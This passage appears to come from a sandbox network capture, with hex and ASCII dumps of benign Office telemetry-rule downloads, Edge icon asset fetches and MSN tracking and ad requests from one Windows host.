2024-11-09 01:47:34 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.7	53040	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:34 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014734Z-16547b76f7fr4g8xhC1DFW9cqc00000009p000000000b0n2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.7	53037	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	516	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: f5c08206-101e-001e-6d49-32b2ea000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-15869dbbcc6sg5zbhC1DFWy5u800000002fg000000007awm Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.7	53039	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	516	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: b18e1dbb-901e-000f-6849-3285f1000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-15869dbbcc65c582hC1DFWgpv4000000048g000000008era Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	53038	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	516	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 0b63e36f-801e-0010-3349-325ee1000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-15869dbbcc6bmgjfhC1DFWzfzs000000020g000000002gkt Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	53036	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	516	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 9d5e99bb-201e-0070-2e49-321bc3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-15869dbbcc662ldwhC1DFWh4e000000000xg000000008rr7 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.7	53041	3.167.152.61	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	1012	OUT	GET /b2?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1483c6dd5b8c2c4ddd31efe1731116854; XID=1483c6dd5b8c2c4ddd31efe1731116854
2024-11-09 01:47:35 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Sat, 09 Nov 2024 01:47:34 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 6cbc168be157bf3c212b3fc18b6cca12.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ORD51-P2 X-Amz-Cf-Id: BPUjoDzg2Q0kY3tWqGVnH0-XrgtJl56SY-aGhOXXsfxT8fYjXTP8pg==

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.7	53033	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:34 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014734Z-16547b76f7f67wxlhC1DFWah9w0000000agg000000004t01 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.7	53042	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 25b6c196-001e-005a-58aa-31c3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014734Z-15869dbbcc6lxrkghC1DFWqpdc00000002r000000000mcgx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.7	53043	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014734Z-16547b76f7fx6rhxhC1DFW76kg0000000aa000000000v760 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.7	53048	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	516	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 1e488ba8-701e-0005-0549-329c78000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014735Z-15869dbbcc6kg5mvhC1DFW39vn00000000v000000000fmnq Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.7	53047	20.99.185.48	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	1000	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1A1E8714CE116135161B9226CFE060A6&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=3f5484eb91cb4fa8d900b5156dcfa066 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
